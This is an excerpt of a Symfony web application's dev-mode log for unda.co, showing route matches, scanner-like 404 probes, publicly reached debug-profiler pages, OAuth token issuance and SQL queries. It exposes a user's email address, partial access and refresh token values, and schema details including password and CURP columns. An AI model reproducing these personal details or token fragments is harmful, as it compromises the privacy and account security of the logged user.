  1138. [2025-12-16 18:38:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1139. [2025-12-16 18:39:22] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1140. [2025-12-16 18:39:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /apps"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /apps\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1141. [2025-12-16 18:39:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1142. [2025-12-16 18:39:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /api/actions"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /api/actions\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1143. [2025-12-16 18:39:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "HEAD /_next/data"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"HEAD /_next/data\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1144. [2025-12-16 18:39:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  1145. [2025-12-16 18:40:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4b64dc","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4b64dc?panel=config","method":"GET"} []
  1146. [2025-12-16 18:40:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1147. [2025-12-16 18:52:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"89abd5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/89abd5","method":"GET"} []
  1148. [2025-12-16 18:52:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  1149. [2025-12-16 18:52:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ba74a2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/ba74a2?panel=twig","method":"GET"} []
  1150. [2025-12-16 18:52:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  1151. [2025-12-16 18:52:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
  1152. [2025-12-16 18:52:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
  1153. [2025-12-16 19:01:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"19f228","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/19f228?panel=time","method":"GET"} []
  1154. [2025-12-16 19:01:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  1155. [2025-12-16 19:02:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1156. [2025-12-16 19:03:36] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  1157. [2025-12-16 19:03:36] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"804cf9","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/804cf9","method":"GET"} []
  1158. [2025-12-16 19:04:31] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=security","method":"GET"} []
  1159. [2025-12-16 19:04:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  1160. [2025-12-16 19:04:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
  1161. [2025-12-16 19:04:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
  1162. [2025-12-16 19:05:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d6e5f1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d6e5f1?panel=request","method":"GET"} []
  1163. [2025-12-16 19:05:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1164. [2025-12-16 19:09:50] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
  1165. [2025-12-16 19:10:10] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"6320af","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/6320af","method":"GET"} []
  1166. [2025-12-16 19:10:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1167. [2025-12-16 19:11:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=request","method":"GET"} []
  1168. [2025-12-16 19:11:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  1169. [2025-12-16 19:13:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  1170. [2025-12-16 19:20:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=35.198.60.231&limit=10","method":"GET"} []
  1171. [2025-12-16 19:20:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.198.60.231&limit=10","method":"GET"} []
  1172. [2025-12-16 19:20:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=config","method":"GET"} []
  1173. [2025-12-16 19:20:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  1174. [2025-12-16 19:21:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=events","method":"GET"} []
  1175. [2025-12-16 19:21:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  1176. [2025-12-16 19:25:18] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
  1177. [2025-12-16 19:25:18] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
  1178. [2025-12-16 19:25:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["119f04a4b23fc92ff69754c3fe [...]"] []
  1179. [2025-12-16 19:25:18] doctrine.DEBUG: "START TRANSACTION" [] []
  1180. [2025-12-16 19:25:18] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"fe99f3dd892fa0f7f14cc6ada1 [...]","3":"2025-12-16 19:55:18","4":"","5":398,"6":"[]"} []
  1181. [2025-12-16 19:25:18] doctrine.DEBUG: "COMMIT" [] []
  1182. [2025-12-16 19:25:18] doctrine.DEBUG: "START TRANSACTION" [] []
  1183. [2025-12-16 19:25:18] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"e150f29e1a2b6ef57e5b887f1b [...]","3":"2026-02-14 19:25:18","4":"","5":398,"6":"[]"} []
  1184. [2025-12-16 19:25:18] doctrine.DEBUG: "COMMIT" [] []
  1185. [2025-12-16 19:25:18] doctrine.DEBUG: "START TRANSACTION" [] []
  1186. [2025-12-16 19:25:18] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"119f04a4b23fc92ff69754c3fe [...]"] []
  1187. [2025-12-16 19:25:18] doctrine.DEBUG: "COMMIT" [] []
  1188. [2025-12-16 19:25:20] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
  1189. [2025-12-16 19:25:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1190. [2025-12-16 19:25:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1191. [2025-12-16 19:25:20] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1192. [2025-12-16 19:25:20] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1193. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1194. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1195. [2025-12-16 19:25:20] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1196. [2025-12-16 19:25:20] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1197. [2025-12-16 19:25:20] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1198. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1199. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  1200. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  1201. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  1202. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
  1203. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  1204. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1205. [2025-12-16 19:25:20] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1206. [2025-12-16 19:25:20] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
  1207. [2025-12-16 19:25:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1208. [2025-12-16 19:25:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1209. [2025-12-16 19:25:20] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1210. [2025-12-16 19:25:20] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1211. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1212. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1213. [2025-12-16 19:25:20] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1214. [2025-12-16 19:25:20] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1215. [2025-12-16 19:25:20] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1216. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
  1217. [2025-12-16 19:25:20] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClie (truncated...)  InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/">   <Error>     <Type>Sender</Type>     <Code>InvalidClientTokenId</Code>     <Message>The security token included in the request is invalid.</Message>   </Error>   <RequestId>ed9a22f2-2e25-5967-be0e-43499a450c0b</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClientTokenId</Code>\n    <Message>The security token included in the request is invalid.</Message>\n  </Error>\n  <RequestId>ed9a22f2-2e25-5967-be0e-43499a450c0b</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n  <Error>\n    <Type>Sender</Type>\n    <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
  1218. [2025-12-16 19:25:20] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  1219. [2025-12-16 19:25:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1220. [2025-12-16 19:25:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1221. [2025-12-16 19:25:20] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1222. [2025-12-16 19:25:20] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1223. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
  1224. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  1225. [2025-12-16 19:25:20] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1226. [2025-12-16 19:25:20] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1227. [2025-12-16 19:25:20] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1228. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  1229. [2025-12-16 19:25:20] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  1230. [2025-12-16 19:25:20] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
